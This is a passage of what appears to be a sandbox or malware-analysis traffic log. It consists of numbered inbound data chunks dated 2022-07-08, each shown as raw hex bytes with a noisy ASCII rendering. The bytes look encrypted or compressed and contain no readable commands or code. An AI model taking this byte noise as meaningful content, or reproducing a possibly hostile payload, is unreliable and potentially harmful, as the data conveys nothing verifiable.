cd 7c 0e b8 97 bc 2d a3 3d 16 dc b0 ec 2d d7 b6 db 7e ff f4 Data Ascii: "d+)C4ERBPCznvYl$h)";vJRnFG6mT@0]F.?,_='w\|H"vmQE%Ph5Qmj`n?O0~V{[<$4Om$~}*\|-=-~
2022-07-08 04:01:38 UTC	48	IN	Data Raw: d8 92 35 f3 92 fe 98 75 cc 7d dd a2 a5 76 1c dd 2f 62 a8 be d3 24 df 09 5b 8e ce fc 8a 6e a5 42 7b 58 78 e9 e1 44 7c 12 a6 a7 e1 71 3a 34 ab 03 bc 2d 75 82 68 70 f9 fa 2e 3b d6 30 4a 66 0e ef 09 32 c3 09 dc b0 8d 18 15 2f 57 2e b6 82 52 15 5b 19 2e df d8 c2 df af ef df 5b e1 a0 82 35 72 7c 52 f9 95 53 9a be 4d a5 ee c4 38 fc 5f b7 b7 40 64 9e e4 13 c9 fb 1e 91 ff 45 8c a3 83 d4 5b 31 ea 85 46 aa 71 6b a4 8a dd be 2b b3 bd 23 f0 96 1d 1a a5 fe 34 1c 3f 12 2c d5 59 17 d8 e1 f4 43 f5 ab 85 7d 8b a9 82 fd bb dd 5d 30 a6 8e 5e c4 c1 76 f5 e0 59 b2 d6 6b 48 51 1d 1d c1 44 e1 5c 93 84 c2 9b f5 f3 d6 a8 91 24 67 83 8e 35 66 81 be 18 82 d6 47 f6 a2 78 89 fd 4b e8 e1 bb f9 bb e1 ac 36 b8 c1 5a 48 59 c1 22 c4 c6 cd 68 06 a6 54 bb 1e 34 83 75 95 c1 f3 0a 77 3e d1 46 Data Ascii: 5u}v/b$[nB{XxD\|q:4-uhp.;0Jf2/W.R[.[5r\|RSM8_@dE[1Fqk+#4?,YC}]0^vYkHQD\$g5fGxK6ZHY"hT4uw>F
2022-07-08 04:01:38 UTC	49	IN	Data Raw: d9 2f cf 86 03 38 73 db ed fc 62 7a 18 97 22 51 b8 76 99 18 76 08 35 08 6e bf be db 3c 15 65 52 a2 53 8e 8b 47 0a 61 0c aa 86 65 ea 37 63 4b 99 e0 08 5f 32 47 b2 ed 34 81 ec 2a 49 84 51 6e e9 b8 7c 5b 83 c5 31 c1 76 e5 a6 06 90 8b cd 9e 33 7b af b5 80 00 41 bc 13 b2 e5 c1 55 80 94 be eb 42 53 05 25 07 2f 52 5a b1 ff b9 35 4a 2e 82 1b 88 41 7d aa 9a cb 87 2f fc c6 71 61 9d 33 3f 6d 2c d1 5d af 2a c5 0f 12 ca a1 e8 a3 60 f9 41 24 dc fe 27 f1 26 38 68 4c 7e 0f 45 67 39 44 4e a4 c6 23 20 db 2b f3 57 4f 9b 8e 96 5c 76 63 34 a2 f7 51 65 72 00 41 2c 85 87 2f 52 5c 12 31 54 85 85 1f 1c 27 69 dc df c8 2c 97 39 c3 eb 48 eb 82 97 09 ab 5f e7 cc 90 65 0f b5 83 5e 3b 73 df b5 49 ec a4 b0 31 ed 70 30 30 95 aa 8b 38 d7 84 07 64 c1 68 a8 87 50 06 8d a1 58 b7 d6 7c 28 f0 Data Ascii: /8sbz"Qvv5n<eRSGae7cK_2G4IQn\|[1v3{AUBS%/RZ5J.A}/qa3?m,]`A$'&8hL~Eg9DN# +WO\vc4QerA,/R\1T'i,9H_e^;sI1p008dhPX\|(
2022-07-08 04:01:38 UTC	50	IN	Data Raw: 93 17 cd 3b d5 6a b3 93 8f bb 3b 26 b2 4c 72 0b 75 71 a9 84 0d ae cb 24 6a 0f 06 46 d0 39 26 f9 2d 58 d8 05 40 3b ec f8 a0 a6 af 42 a0 42 a5 6d f7 fa b5 b8 13 0a 47 61 e0 21 1b f1 72 12 ed c1 e5 4c 44 21 76 eb 41 00 66 d2 86 1c cd 92 f0 4d d0 0d b4 d2 92 98 7a 3b e0 a8 b2 4c ac dd 9c 07 21 c4 3d c8 99 18 3e 50 dc ed e6 12 3c e6 96 04 a6 82 be fe 19 76 0a 1c 23 af bf be 91 fc 13 67 7a 4e 72 87 01 45 22 c4 cb aa 8c 74 91 cb fb 4b 93 f9 59 6f be 68 b4 e7 2a 8e dc 3a 51 18 71 71 e7 47 6e 53 9c d1 24 cf fd ee a1 18 b8 77 c6 81 36 79 a5 a3 80 2b 48 b5 f5 9b 3f cb 44 86 9d 0c d6 6b 23 c7 37 08 25 52 77 bf c4 28 e2 67 23 99 06 b0 c6 2b c3 65 34 72 21 c7 cc 11 b9 8d 3c 2a 70 f0 bf a8 d3 3e 1f 9c 16 dc b1 c4 39 d7 96 91 0d 89 f6 34 d2 22 f5 e2 63 7e 0e 57 7f 09 5e Data Ascii: ;j;&Lruq$jF9&-X@;BBmGa!rLD!vAfMz;L!=>P<v#gzNrE"tKYoh:QqqGnS$w6y+H?Dk#7%Rw(g#+e4r!<p>94"c~W^
2022-07-08 04:01:38 UTC	51	IN	Data Raw: bd 13 d3 51 75 68 a0 bc af 7c ce 03 47 e3 ab ec 8f 0b d3 52 71 3d c4 ef f0 49 7e 12 98 70 e4 ff 87 59 1e 50 bc 27 74 4f 77 49 3a 94 c2 30 c7 3e 2c 5b e3 ee 03 2b 19 c6 d0 ad 89 4f 1e 40 0c 38 3b 8f 8e 12 72 44 3a cb fa 70 df af e4 db d7 b0 a2 82 0b 5a 95 0b f9 91 44 16 ef 4d a7 ef e2 c0 a7 36 bd 95 a3 64 9e ee 1f 2f 72 31 16 ff 44 9f 2d 92 d2 5e 0d b3 f4 af ad 69 ec af f9 37 be 38 b2 a1 21 ee 8f 1e d7 7d f4 23 00 dc 11 2c d5 52 da 19 ea e7 45 f7 a1 e2 bd 92 24 da ee be cd 4b 2c b1 ec 9d d2 5d 6d e9 f2 57 41 10 67 5f 73 90 18 d9 21 1f 4c 9e 98 5a b4 85 b0 da be 01 1f 72 92 8b 50 5d 8c be 12 8a f9 42 f1 b3 76 b7 4c 4f 66 5c a0 2f ba e1 bd 2e 61 ca 4c 5c 31 a3 94 dc 16 d2 9b 98 74 55 b1 c8 f9 81 6d b1 d3 d2 36 28 3e d7 5b 1e 39 e8 f9 74 b3 5b 9b 37 19 11 35 Data Ascii: Quh\|GRq=I~pYP'tOwI:0>,[+O@8;rD:pZDM6d/r1D-^i78!}#,RE$K,]mWAg_s!LZrP]BvLOf\/.aL\1tUm6(>[9t[75
2022-07-08 04:01:38 UTC	52	IN	Data Raw: 03 69 29 a1 88 9e 8e 1f 6d 91 89 17 05 bf b7 87 13 14 49 5a a3 6b 80 17 d6 96 3c c7 aa 8f 78 67 e2 4e 43 9b ea 2d 5c 2e f4 ac e0 35 9b d6 cb 50 25 77 74 64 96 6f 7f 93 cc 34 d4 67 cf a8 e6 b9 51 c2 9c 3a 14 c6 a3 91 20 38 b2 0a 9a 15 ca 4c 87 85 95 ed 98 3d fc 26 1f 28 43 71 b6 22 d7 cf 49 39 85 0a a3 48 ec 7c b7 c9 a6 3b e6 a1 e1 46 63 3b 23 54 cb bf 84 a4 00 cf 1e 16 cf 80 e9 2d a5 96 9b 25 57 f4 34 c5 47 69 e4 63 74 02 56 77 1b 51 7d 93 2f 32 01 cb 27 b6 6e bc 8d 70 9f 24 a2 4e 23 80 19 75 74 52 00 65 cf d3 87 2f 59 67 fe 21 73 a7 3e f1 1d 2d 4b ef f5 0e 2b bf c9 c7 84 1c 84 c8 9d 03 a8 32 a2 cb 81 67 18 9b 62 0a 2c 5b 11 6b 45 fb 91 99 27 f9 40 a1 6e 99 a2 ad f3 f8 73 db 7d c0 73 73 1e d1 0c 53 b1 55 54 fa 7c 22 89 9d 68 77 53 e4 24 78 51 fb ff fe e0 Data Ascii: i)mIZk<xgNC-\.5P%wtdo4gQ: 8L=&(Cq"I9H\|;Fc;#T-%W4GictVwQ}/2'np$N#utRe/Yg!s>-K+2gb,[kE'@ns}ssSUT\|"hwS$xQ
2022-07-08 04:01:38 UTC	53	IN	Data Raw: eb 44 9f ae ba 72 4f 19 b2 f3 4a ac 69 fd ae fe d1 bf 38 a3 a0 00 b7 87 1a b2 bc 9a ea 0b b3 49 27 0b 49 90 e1 c7 e7 4f ee b4 94 7d 98 0c fe fd bb d6 90 3d b0 a9 48 d3 1c 7b f8 f7 4f 2e c7 66 4a 79 81 1d f3 4f c7 4d d9 93 52 b7 fb e2 da be 16 0c 76 82 95 0f bf 8d 8b 19 99 fe c3 f6 a2 63 d2 89 4a e8 e1 c3 fd af c9 49 27 bf d6 4a d4 59 4f 95 dd 0f df e5 71 63 56 19 05 23 9f 70 b5 27 da 59 7f 36 c3 79 3d 3c c0 b6 63 3e 56 b1 37 19 1e 31 9d de ce 0b 56 a6 43 60 00 78 9f 08 60 6f ff 80 ab c8 c0 4b 51 60 ad 8b 28 47 bd 25 90 5a dd 7a 83 24 41 9e 19 75 41 ee 4a 32 cc 3e b9 ab 99 f5 6a ab d2 9a 4c a0 8a 46 3b 18 22 fd f4 a8 27 31 77 5f 85 c8 98 16 83 ce f6 d8 2a 95 d6 25 a1 88 df d5 4c 2f c9 db b5 f5 0e 1e 36 1c b7 8a a9 0f 37 a6 46 b9 38 a6 01 06 78 d8 45 43 1d Data Ascii: DrOJi8I'IO}=H{O.fJyOMRvcJI'JYOqcV#p'Y6y=<c>V71VC`x`oKQ`(G%Zz$AuAJ2>jLF;"'1w_*%L/67F8xEC
2022-07-08 04:01:38 UTC	55	IN	Data Raw: c0 22 47 9d 1f 20 75 16 68 87 a7 3d 19 8f c0 df 3e 5b 13 e2 68 64 da c3 c9 27 df 39 69 ee 7c 43 f1 45 58 15 56 e5 0c e7 2a d7 17 27 b7 60 87 88 85 9c 3e ae 75 ca a9 c8 74 6c 47 1a 60 52 5e 98 11 a6 4e 19 29 4b 48 4f 1e 1c 32 7e 86 d6 c8 3b b4 db 3c ea 62 8d bb b6 08 a1 4a c4 d2 92 68 1e 8c e7 a2 0c 8d d4 47 4c ec 88 80 05 f1 49 68 7e 9e aa 90 ef cf cd 27 7c ea 6a 7f 85 81 01 4c f4 6e 94 fb 6d 23 e7 8c 68 5b 55 8f 27 4d 61 bb 23 ce e9 5f 0d 6b b8 95 5f 67 45 e1 99 a0 b1 8b 48 63 f4 ec d6 85 96 7d 6e 95 ce e7 bf 79 bd 6c 6f e5 00 ba 8b ea 7d d3 47 eb bf 27 55 ee 49 3c c9 52 c4 66 23 ad 96 40 4a 74 fd e8 71 84 70 29 94 57 a8 2c 89 00 73 d8 4b f5 ff d5 3e a0 c0 2b 74 32 6a 72 30 86 f5 9c 44 fd 4c da b9 c6 42 13 eb cc c2 67 34 f3 1b f6 f7 44 ce 55 bc bc 91 6f Data Ascii: "G uh=>[hd'9i\|CEXV*'`>utlG`R^N)KHO2~;<bJhGLIh~'\|jLnm#h[U'Ma#_k_gEHc}nylo}G'UI<Rf#@Jtqp)W,sK>+t2jr0DLBg4DUo
2022-07-08 04:01:38 UTC	56	IN	Data Raw: c9 59 5e 5e 83 d7 37 c0 f4 72 62 ab ba 38 25 93 6f 9d d2 cd a7 74 12 d5 46 c9 3e c7 a8 8a b2 7d b3 1c 1a 26 d6 8e a1 dc 1d da 63 69 42 03 d9 f3 08 75 7b d3 58 aa c8 ca 50 75 4a ad a0 28 41 aa 3d 97 5a cc 6d 9b 0b 4b 9a 08 66 1d fe 62 24 c0 1d 4b ad 8f 01 63 93 f8 8c 44 a0 8b 49 48 1e 0e ff de b9 08 c3 71 32 97 45 5a 12 a9 ed 56 ca 53 84 c3 0d 57 a3 95 dd 6c 2c e1 d9 bc f7 7b fe ba 1b bd f7 ac 1a 23 b6 44 3a 08 a5 0b aa 51 3b 47 d5 1b cd 2a bd 23 a7 93 85 bd 60 e7 b2 4c 72 75 7b 0a ab 9e 1e a3 c7 32 68 07 19 67 ec 37 3b 2f 2f 77 d6 12 25 4f 76 d0 bb 80 97 6a aa 5d b3 6f ff e2 97 ea 06 8f 43 4c e3 3d 1b f7 64 10 ea f5 f2 a3 4c 1c 5d 6b 47 1e d4 fe 94 1c cb 91 ac 6e d0 0d ae 95 71 99 7a 3b ee 19 ba 5b 70 ba 98 16 29 ce 27 41 31 20 f7 57 f4 f9 ea 0d 21 1e f8 Data Ascii: Y^^7rb8%otF>}&ciBu{XPuJ(A=ZmKfb$KcDIHq2EZVSWl,{#D:Q;G*#`Lru{2hg7;//w%Ovj]oCL=dL]kGnqz;[p)'A1 W!
2022-07-08 04:01:38 UTC	57	IN	Data Raw: 50 89 60 ad 84 80 e4 d0 8d d0 a7 d5 66 72 fd 52 0d 53 ba 55 96 f8 7c 2e ec 5a 59 77 59 94 3b 61 5e f9 ee d8 86 78 12 78 b5 e8 46 6d 5a cc 4c ac 9f 82 2c 2d d2 ed d0 90 ec 6a 45 86 c1 f6 aa 70 d9 41 90 e4 28 9b b8 ef 05 d2 51 3d 2a 5e 41 e6 4b 41 d0 7f d7 69 0b 62 9c 5f 55 83 fe bf 7e 8d fe 9a 51 5e 8f f7 9a 0b 73 cb 3b e2 cd 2b 3b 9a ea 25 0a 2b 43 ac 37 81 90 83 54 f9 37 bc 4b c7 46 1b fe 6d ab 92 35 f7 6c f4 99 64 cb 5d 90 bc ae 6f 0e 50 64 67 b6 41 c1 02 dc 01 4f 8b a6 fc 8a 60 3b 85 0c 3e d6 e8 e5 51 66 05 8b 61 f1 74 2a c8 c5 7d ad 2f 04 9b 6c 58 3b f9 55 38 c6 34 21 ee 04 f4 10 24 c5 09 df b9 5b 48 3b 38 53 43 33 84 52 11 58 76 33 ca f0 5e d7 b9 e6 ef 09 b1 a0 88 2a 49 8a 52 e8 9a 53 e8 ee 61 a6 f7 ff c5 fc 4e b8 80 aa 9a 9f c2 02 17 5c 2e 9b ec 41 Data Ascii: P`frRSU\|.ZYwY;a^xxFmZL,-jEpA(Q=^AKAib_U~Q^s;+;%+C7T7KFm5ld]oPdgAO`;>Qfat}/lX;U84!$[H;8SC3RXv3^*IRSaN\.A
2022-07-08 04:01:38 UTC	59	IN	Data Raw: 54 c8 3d 87 d9 1e 54 89 ce d8 5c c5 e0 f5 bc f7 20 73 ba 1b bd 80 b1 08 24 b2 7f 26 25 58 0a 3e 77 2a 41 5b 1d da b6 c9 42 a7 92 9c b5 02 82 a4 5b f4 2e 79 71 a8 3d 0f a3 c0 1d 39 01 06 5d f7 26 31 07 26 e8 c8 07 4d 2d 67 d7 aa 58 ae 64 8f 4c b5 68 fe ed 29 b0 04 f4 47 41 eb 2f 11 72 23 03 e2 df 4e ba 51 25 15 fb 4a 12 d4 fa 95 1c c7 04 3c 52 d7 0d be fd 91 66 7b 1d cb 10 a1 4b a6 b8 97 18 28 21 2f e3 81 03 2b 75 c3 f6 fa 0a 27 09 90 31 73 81 ba 94 66 74 02 15 01 31 c5 be 9b ed 0f 76 55 ab 62 80 17 b9 0b 0d ee bb 80 72 9f f4 ef 4c 93 f3 2b 4c b6 7e aa 61 64 92 cf 34 f3 00 6a 46 a9 b8 6f 75 ba c0 2c d9 6d 5a ad 0b bf 7d dc 99 27 94 ab 8f b9 35 51 ba 0d 8d 9e c6 55 8a 84 8f ff 77 39 c6 32 8b 74 43 78 a1 7e c7 e6 5f 06 c8 0b aa 5c 3a 7d 99 cb 87 a2 c1 d6 0d Data Ascii: T=T\ s$&%X>w*A[B[.yq=9]&1&M-gXdLh)GA/r#NQ%J<Rf{K(!/+u'1sft1vUbrL+L~ad4jFou,mZ}'5QUw92tCx~_\:}
2022-07-08 04:01:38 UTC	60	IN	Data Raw: 2a 3f 88 c8 0e 19 2c 16 43 37 81 9e ab 45 fd 4a a6 7a c5 42 31 fc 16 ad 9b 35 f3 00 e8 93 4f d4 55 bd b4 5b 7d 27 52 6d 69 a8 b8 d6 d0 cf 2f 4f e7 a4 fd 8d 7c c6 52 5d 35 fc ea ca ad 6d 6d a0 60 e0 75 1a 14 c6 52 c1 03 7e 91 69 72 4d f9 06 26 c7 34 2f 36 0d 92 0a 23 c5 12 d8 a0 d8 43 15 2f 5b 3a 3e f8 59 17 5a 07 10 ad ef 46 f7 7b e5 c7 dd 30 95 83 34 5e 90 48 d1 4b 44 16 e5 cd 93 ee ec c4 d6 4c 8d 9c a3 d3 9e ee 04 81 76 31 80 e9 48 a7 0d 92 d2 4f 19 b0 9a b8 ad 45 f7 dd b2 dc bf 3c 90 95 28 e6 8d 23 20 b4 f5 23 14 bf 43 24 cf a6 b4 e5 ed cf 07 e5 a7 97 72 9f 24 d8 e6 45 dd 62 3a 9f c9 49 d3 5b 7b f4 f7 47 30 39 67 73 77 ff 25 c0 4e c3 5a b6 9e 50 b7 e0 fd d3 b2 0b 04 61 7d 8f 13 b4 95 b2 18 91 e7 ad f7 8e 69 df 6b 4a e8 ef e7 c7 b9 e1 b1 5b 88 d1 5d 5d Data Ascii: *?,C7EJzB15OU[}'Rmi/O\|R]5mm`uR~irM&4/6#C/[:>YZF{04^HKDLv1HOE<(# #C$r$Eb:I[{G09gsw%NZPa}ikJ[]]
2022-07-08 04:01:38 UTC	61	IN	Data Raw: 90 67 83 98 20 45 a4 3c af fa 87 92 a4 3b cf 24 b4 4b c9 f4 90 07 2b 03 28 e5 86 12 2c 4f dc fc eb 0d 21 18 b3 02 8d 8a 96 99 18 76 1b 25 0f 08 b3 bc 9b ed b4 65 52 ba 5b c2 08 47 0c 2b b9 75 87 65 93 e8 65 63 d5 f0 2a 47 97 2f b1 ed 33 ba ed 35 51 03 56 26 ea b9 69 57 b1 c0 2e d3 08 25 b1 18 b2 7a e5 d7 3a 6a ac 8b d6 27 57 a5 23 b8 13 c1 5f a2 cf 9f fa 60 14 f3 24 07 2f 2c 9b a1 dc dc e4 63 65 8b 0a ac 7e 55 7e 9b cd a5 1c de df 14 91 d0 30 35 7a 26 9d 84 ae 20 a0 fd 17 dc ba eb 05 9a 95 9b 23 f4 b3 37 d4 3f 50 c7 63 7e 05 6c 3a 1b 55 6d 93 cd 32 01 c7 5b 50 7e b9 91 89 b4 60 a6 62 32 80 a3 74 74 52 39 42 43 55 8d 07 08 4c 35 26 5b 8e 4d 1e 16 42 a2 94 dd c2 2d 97 92 c1 eb 48 ac 8f 94 09 a7 64 ed cb 81 69 36 cf ef bd 3c 5b f6 6b 45 f7 ed 7f 37 fc 5c 58 Data Ascii: g E<;$K+(,O!v%eR[G+ueec*G/35QV&iW.%z:j'W#_`$/,ce~U~05z& #7?Pc~l:Um2[P~`b2ttR9BCUL5&[MB-Hdi6<[kE7\X
2022-07-08 04:01:38 UTC	62	IN	Data Raw: d6 51 e4 eb de a1 a4 8b ae 56 90 58 ea 9a 44 07 ea 53 5b ee c0 c6 d7 14 a2 96 b0 61 9e ff 01 06 88 30 bd eb 42 9d 8c f3 d1 4f 1f 90 a4 46 ac 63 89 f8 8a dd b5 22 ab a9 28 f7 82 02 46 b5 d9 2a 79 e4 43 2c df 52 ac da ef e7 5e e1 b8 9d 97 92 08 d8 f4 ac 0a 43 22 ba 90 4d d3 4c 62 e7 fa b1 2f eb 6d 56 68 85 93 76 7c 5c 52 90 81 57 b7 fb e7 c6 40 0a 20 7d 81 a6 57 b7 8d b4 0b 9d e3 40 f3 a2 63 a4 4b b5 e9 c7 cc e2 a8 e4 b7 34 ba cf 4d a7 5f 63 97 f7 19 e3 4c 8b 8a aa bd 7b 79 8b 64 97 ff c5 42 45 3a d7 83 c3 3e c0 15 74 b3 40 b3 1f 4b 0c 35 8a d1 ab 09 d8 67 49 6a 06 b5 d0 0c 74 71 c4 7c bc db c7 7b ed 49 ad 88 39 4f bb a5 0d 57 d4 53 ab 20 50 90 22 74 db 70 4f 26 d8 1f 38 7d 98 ff 64 ac fc 45 5d 85 a4 7c b6 1f 28 ee fd 93 0d 20 73 43 4f 37 5b 16 83 de 52 cd Data Ascii: QVXDS[a0BOFc"(F*yC,R^C"MLb/mVhv\|\RW@ }W@cK4M_cL{ydBE:>t@K5gIjtq\|{I9OWS P"tpO&8}dE]\|( sCO7[R
2022-07-08 04:01:38 UTC	64	IN	Data Raw: 8b 11 98 13 cb 3a 43 84 9c f0 6c e2 de 0c 2a 25 43 72 b4 d6 fe cd 4b 2e 82 d4 aa 50 38 7d 9b cb 8c 2e de df 1e b9 92 33 2a 51 0e b0 99 ae 2a ce 0d 26 df b0 bd 2c d7 96 32 25 dc e5 22 c7 3c 40 a7 62 7e 0f 44 65 1d 4a 67 45 ef 1e 09 c4 23 65 72 a6 96 9d 99 2f b4 67 2f 56 e5 5b 7f 56 39 59 43 55 8d 03 3a 53 26 25 73 bc 48 01 17 d3 40 b9 c8 ce 22 97 af c1 eb 48 ac eb 97 09 ab 23 94 cb 81 69 01 91 ff b8 3a 62 d0 77 bb fc ae 97 34 d4 3e 5e 6d 9f b9 85 f9 c3 8b d9 6c c3 7a 88 93 7b 05 20 e7 7d 9f f1 76 31 e9 77 69 66 5c 81 20 ac 50 d7 e7 c7 f8 5b 9d cf 81 b5 51 62 49 cd 67 b0 98 9f 34 bc f4 c0 da e5 c6 62 44 8c ef f8 be 61 a7 47 80 e1 33 a3 64 ec 52 d3 41 39 27 d2 45 f0 43 29 d3 7e c6 68 3c b2 63 5e 73 83 c4 5e 78 8c fe 81 88 40 b2 3a 8b 0e 6d 37 41 c6 ca 00 8b Data Ascii: :Cl%CrK.P8}.3Q*&,2%"<@b~DeJgE#er/g/V[V9YCU:S&%sH@"H#i:bw4>^mlz{ }v1wif\ P[QbIg4bDaG3dRA9'EC)~h<c^s^x@:m7A
2022-07-08 04:01:38 UTC	65	IN	Data Raw: 3d 96 e8 e2 d0 60 04 29 5e ae 8e 3f bc 9e b8 30 b7 fe 53 fc 7c 72 b0 59 63 82 ea cf f3 d4 c0 b5 25 b5 0e 52 7c 76 62 95 dc 16 c8 f3 5d 5b 55 bb 1e f9 8b 75 99 fd a6 58 75 38 b8 70 c0 3e ca 6e 7b 96 79 9c 37 18 07 26 84 f2 f6 1c da 6d 9d 60 10 de a6 89 75 7b d1 1d 8b ca ca 49 9b 47 88 a0 05 41 aa a2 84 53 f5 55 90 20 5a 44 0f 60 e7 d7 22 27 d8 10 24 8b 9b ff 68 61 f5 be 67 8d 8c 51 bc 0c 28 d5 db bb 23 2a ad 49 83 40 72 75 82 cf 52 a6 0f 83 c2 07 8d 86 fa f7 69 3b e1 d3 a5 fe 20 26 bb 1b bd 54 a8 0a 27 9a 15 20 38 a0 64 33 52 3b 4d 9d 14 e8 13 e3 42 a7 99 9c bd 3b a8 b2 4c 72 a1 79 60 ad b7 77 a6 d4 33 16 21 04 57 d5 f8 3c 22 04 59 d6 14 40 3e 7b f8 9f a6 af 42 75 5d a2 7a d0 94 a5 b7 02 9b 67 4f e3 33 d6 f1 57 2b cf de ec b8 56 03 7d d4 4a 18 f6 24 97 0d Data Ascii: =`)^?0S\|rYc%R\|vb][UuXu8p>n{y7&m`u{IGASU ZD`"'$hagQ(#*I@ruRi; &T' 8d3R;MB;Lry`w3!W<"Y@>{Bu]zgO3W+V}J$
2022-07-08 04:01:38 UTC	66	IN	Data Raw: f7 82 e5 c7 dd a3 bc aa 1a 5a 8f 58 27 9f 55 12 c7 3b a4 ef ea af dd 5d bd 95 7d 6b bb c6 29 1f 76 3b 82 e2 6c b1 a4 92 d8 91 19 a9 83 6e 27 68 e6 a5 e5 fc bd 38 b2 72 24 ce aa 1a b8 be dd 0d 0a b3 49 f2 d5 49 b1 e1 8b e6 4f e2 c8 b0 6b 93 2e 0e f2 9e f4 63 3d b7 89 5b cd 75 49 f8 f7 45 f0 c7 77 5b 51 db 1c c1 48 a8 6c 9c 92 58 69 e5 c7 f2 93 0b 0c 7c 90 91 17 98 8d be 12 47 fe 42 f2 8a e2 a0 5d 4d 87 ca cd f5 b1 3f bb 0d 92 d0 5d 53 76 61 95 dc 16 05 f4 64 71 7d ce 15 27 8d 0b bc d7 db 53 ab 31 f2 79 ef 3e c0 ba 67 93 79 9f 37 18 07 eb 8c cb dc 34 8c 66 43 66 6e fb 8c 0c 7e a5 d8 57 82 e5 ca 43 4f 5b 8c a0 06 41 aa a2 49 5a cc 7f b8 a7 51 9a 09 1e c2 fd 4e 2c 06 19 6e 82 b4 ff 62 b5 e9 b9 67 8e 8c 51 bc c1 22 ec f1 93 51 21 73 4f fd 65 58 16 89 11 5b ec Data Ascii: ZX'U;]}k)v;ln'h8r$IIOk.c=[uIEw[QHlXi\|GB]M?]Svadq}'S1y>gy74fCfn~WCO[AIZQN,nbgQ"Q!sOeX[
2022-07-08 04:01:38 UTC	67	IN	Data Raw: fd 0d 9a 13 cf 55 8a 85 f0 fc 66 3c df 24 07 25 5e 78 a0 dd d6 e3 4b 2e f3 0c aa 56 1c 7d 9b cb 04 38 de df 12 b9 9c 33 28 7c 0e bf 84 ae 2a cf 8b 10 dc b0 e2 2d d7 96 38 23 dc f4 3b d4 39 78 f8 63 7e 0e 44 74 18 55 d9 bd ee 32 0f cd 34 b3 bf bf 9b 8e 93 2f a5 62 29 a8 e4 76 74 54 11 60 8c 53 87 2f 56 4f 35 20 ae ab 4d 1e 10 2d 41 95 c0 c8 2a be c3 c2 eb 4e 6d ce 97 09 af 4c cf cb 76 65 1e 9d e3 bd 3a 73 c8 6b 45 fc 82 9c 36 fc 50 58 6d 95 a4 81 e4 d0 9a de 7d c6 6d 76 92 57 11 53 b0 7c 9f fb 7c 28 d9 75 69 77 57 9e 2d 52 60 fc ec ce e6 5f 13 78 ae 95 4e 6d 5a c8 67 a1 dd 87 3b 42 fb ec d0 96 df 65 44 86 ca e7 ae 72 bf 47 91 e5 2c aa 9a ed 23 dd 50 3d 20 48 49 ef 22 3d d6 7e d8 6d 23 bc 80 5f 5f 8b fc c4 78 8c 84 99 87 53 b9 3a 9a 0b fb ce 40 ea c0 2b 3f Data Ascii: Uf<$%^xK.V}83(\|-8#;9xc~DtU24/b)vtT`S/VO5 M-ANmLve:skE6PXm}mvWS\|\|(uiwW-R`_xNmZg;BeDrG,#P= HI"=~m#__xS:@+?
2022-07-08 04:01:38 UTC	68	IN	Data Raw: 54 a1 66 b3 da be 0a 1a 5e 7a 8e 3f bc a1 bb 20 40 fc 53 f6 b4 61 b1 23 5a e9 eb c5 e6 aa f0 b8 05 bf d2 5d 59 4c 5f 87 cd 34 65 f4 75 73 d9 ea 14 27 8a 77 9b c4 dd 4f f9 6f d7 51 c3 28 e8 49 74 b3 5b 9d 32 20 ae 37 8c da c9 0d c9 6b 52 70 17 e4 19 0e 74 7b c0 63 ba db e1 50 56 70 2f 8a 28 41 bb a4 86 5d f5 6d 91 20 5a b2 1e 71 e3 f5 5d 33 f0 3d 49 aa 93 e1 51 a6 e8 97 5d ac a4 79 b4 1f 28 ec f2 93 de 20 73 43 f8 92 72 3a 81 cf 5e e2 36 93 ce 1f 5f a1 f2 dd 44 31 f0 de 9e 08 08 08 b1 cd a9 50 80 35 21 b2 64 5f 29 a7 0b 18 43 22 56 56 74 d8 3a ce 48 8f 1f 8c b1 15 e9 9d 4e 78 75 6a 52 bb bd 0f 84 c5 20 51 11 06 57 d5 49 03 05 2c 7e b9 01 4a 2d 7c f8 97 a4 af 42 ba 48 dc 6b f9 fa ae 9f 89 f7 46 4b 8c 16 0a fe 78 10 c2 cf cc a3 50 25 44 fa 4a 12 93 ca 95 1c Data Ascii: Tf^z? @Sa#Z]YL_4eus'wOoQ(It[2 7kRpt{cPVp/(A]m Zq]3=IQ]y( sCr:^6_D1P5!d_)C"VVt:HNxujR QWI,~J-\|BHkFKxP%DJ
2022-07-08 04:01:38 UTC	69	IN	Data Raw: 29 32 80 df c8 20 b5 eb ec eb 4e 8e 16 97 0f 8b 4d df cb 81 63 1e 9d ec c8 4f 73 c0 76 45 fd 83 87 06 f8 56 d6 6c 95 aa 31 e4 d0 9f c6 61 ee b6 76 92 5d 24 cb b3 7d 99 d3 5f 28 fa 78 64 7e 71 cd 2c 52 57 f0 9f db eb 5f 19 72 b4 fa 10 6c 5a c2 74 ae 8b 93 35 7a b8 ed d0 96 80 6d 55 88 5f f4 aa 63 a6 6f aa e4 2c a0 b7 e8 46 e8 51 3d 2e 59 4d 9c 9e 3b d6 78 c4 6a fd ae b8 77 72 8a fc ce 6b 84 d6 b0 87 53 bd e7 8f 0a 73 c9 51 ed e4 53 3c 8c e4 43 ca 2e 6b 74 1b 84 a2 83 44 fd 4a a4 4e ef 55 1b fc 1c c2 8a 37 f3 1b 91 80 66 cf 5f 92 f3 a4 7c 0d 43 70 1c 9a bf c0 24 dd 05 5b e1 a8 92 58 65 38 55 66 ed c4 f8 f2 47 57 d1 8e 61 e0 60 37 27 cd 79 df 2e 7f 97 02 8c 3e fb 28 22 cd 25 22 25 07 c7 67 22 c5 1e b5 70 a4 49 11 3c 5a 29 3d 91 ac 14 4b 0b 44 f9 f0 5a d5 b9 Data Ascii: )2 NMcOsvEVl1av]$}_(xd~q,RW_rlZt5zmU_co,FQ=.YM;xjwrkSsQS<C.ktDJNU7f_\|Cp$[Xe8UfGWa`7'y.>("%"%g"pI<Z)=KDZ
2022-07-08 04:01:38 UTC	71	IN	Data Raw: 7d cb 5c 4d 26 de 79 9f ab 99 f9 71 b5 eb 92 5e ac a4 f5 b5 1f 24 92 21 ba 23 26 5b 1b 93 44 5c 05 8b de 5c dd d0 80 d3 05 2d bb df df 4e 2d c9 e9 b6 f5 02 1e 45 1a d7 a6 8d 0a 24 9e 4f 09 0e a7 0b 18 41 32 56 4f 33 a8 38 ce 44 c8 47 8e b1 15 e9 e0 4c 78 75 68 76 81 ce 1f a7 d2 26 71 11 00 7f 3e 26 33 0d 01 37 c7 1e 62 cc 76 d0 bb 8b 95 59 a3 71 85 0d c3 fb a4 b1 17 f9 57 40 f2 3f 67 bf 73 03 e4 cf e1 a3 4f 62 68 fb 4a 1e ed f7 86 14 a2 a7 21 41 d6 1c a2 d2 bf 9b 7a 37 a7 4b b3 4c a0 af 81 0a 4e 18 2f cf 8c 3a d7 5e dc fa fa 05 f9 17 